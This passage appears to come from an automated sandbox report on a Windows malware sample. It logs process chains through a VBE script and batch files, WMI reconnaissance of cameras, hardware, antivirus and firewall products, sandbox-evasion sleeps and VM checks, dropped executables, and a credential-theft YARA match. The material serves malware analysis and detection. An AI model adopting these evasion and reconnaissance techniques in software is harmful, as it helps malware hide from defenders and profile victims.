                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Memory allocated: 1240000 memory reserve | memory write watch
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Memory allocated: 1B1F0000 memory reserve | memory write watch
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Memory allocated: 28F0000 memory reserve | memory write watch
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Memory allocated: 1AB10000 memory reserve | memory write watch
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Thread delayed: delay time: 600000
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Thread delayed: delay time: 3600000
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Window / User API: threadDelayed 1647
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Window / User API: threadDelayed 8155
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UxpXqoOQ.log
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CUGzHwzy.log
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ffpwzeUX.log
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ddDNduPc.log
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dVTvzLpX.log
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oOILjGZF.log
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EQOQCKPT.log
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vnZStDyM.log
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mKRcJKjf.log
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VDAxqXDQ.log
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe TID: 7488 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7672 Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888 Thread sleep time: -29514790517935264s >= -30000s
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888 Thread sleep time: -600000s >= -30000s
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7872 Thread sleep time: -10800000s >= -30000s
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595547s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595438s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595328s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595210s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -595094s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594984s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594875s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594766s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594656s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe TID: 7888Thread sleep time: -594547s >= -30000sJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00FBA69B
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00FCC220
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCE6A3 VirtualQuery,GetSystemInfo,0_2_00FCE6A3
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: ChainPortServerBrowsermonitor.exe, 00000004.00000002.1716950692.000000001BA3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA
                                    Source: wscript.exe, 00000001.00000002.1686536575.0000000002917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4120908873.000000001DB90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                                    Source: wscript.exe, 00000001.00000002.1686536575.0000000002917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeAPI call chain: ExitProcess graph end nodegraph_0-25066
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FCF838
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FD7DEE mov eax, dword ptr fs:[00000030h]0_2_00FD7DEE
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FDC030 GetProcessHeap,0_2_00FDC030
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF9D5 SetUnhandledExceptionFilter,0_2_00FCF9D5
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FCFBCA
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FD8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FD8EBD
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe "C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe "C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe" Jump to behavior
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH,
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US /
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.1",5,1,"","user","123716","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\Temp\\Crashpad\\reports","2E3DBMT9F (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]@
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF654 cpuid 0_2_00FCF654
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00FCAF0F
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeQueries volume information: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe VolumeInformationJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeQueries volume information: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00FCDF1E
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBB146 GetVersionExW,0_2_00FBB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ChainPortServerBrowsermonitor.exe PID: 7464, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: KSFasOVYpBufeMshBMPdEDfTcvlm.exe PID: 7668, type: MEMORYSTR
                                    Source: Yara matchFile source: cuAvoExY41.exe, type: SAMPLE
